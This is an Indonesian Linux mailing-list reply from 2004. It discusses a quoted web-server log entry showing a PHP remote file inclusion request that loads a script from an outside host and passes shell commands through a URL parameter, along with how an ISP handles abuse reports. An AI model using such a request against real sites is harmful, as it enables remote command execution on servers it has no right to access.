13/03/2004 17:04:32, Rio menulis: RM> /main.php?cont=http://develbox.bhc.or.id/~pupet/pupet&cahyo=cd%20/var/tmp%20;%20cat%20cahyo.txt
Kalo boleh saya duga sebenarnya yg dituju itu adalah halaman pribadi (~pupet), mungkin juga yg mengaksesnya yg punya situs tsb. Saya sendiri sering menaruh script2 tertentu, contoh yg mudah misalnya script berisi phpinfo. Script yg ekstrim bahkan bisa melakukan perintah shell (spt kasus di atas), yg seringkali tanpa password. Pemisahnya hanya tahu dan tidak tahu adanya script tsb. RM> Oh ya sengaja saya buka ini ke public, sebab saya capek nungguin RM> tanggapan abuse nya Indosatnet, kagak respon. Berhati-hatilah Bila saya berlaku sbg adminnya Indosatnet, apa yg saya bisa perbuat dgn laporan abuse tsb? Anda tahu abuse dari mana? Kecuali ada kasus lebih lanjut, misalnya jebolnya server, dlm hitungan detik email tsb berpindah ke trash-box. Tertanda, Oguds [36856104] -- Unsubscribe: kirim email kosong ke [EMAIL PROTECTED] Arsip dan info di http://linux.or.id/milis.php FAQ milis http://linux.or.id/faq.php
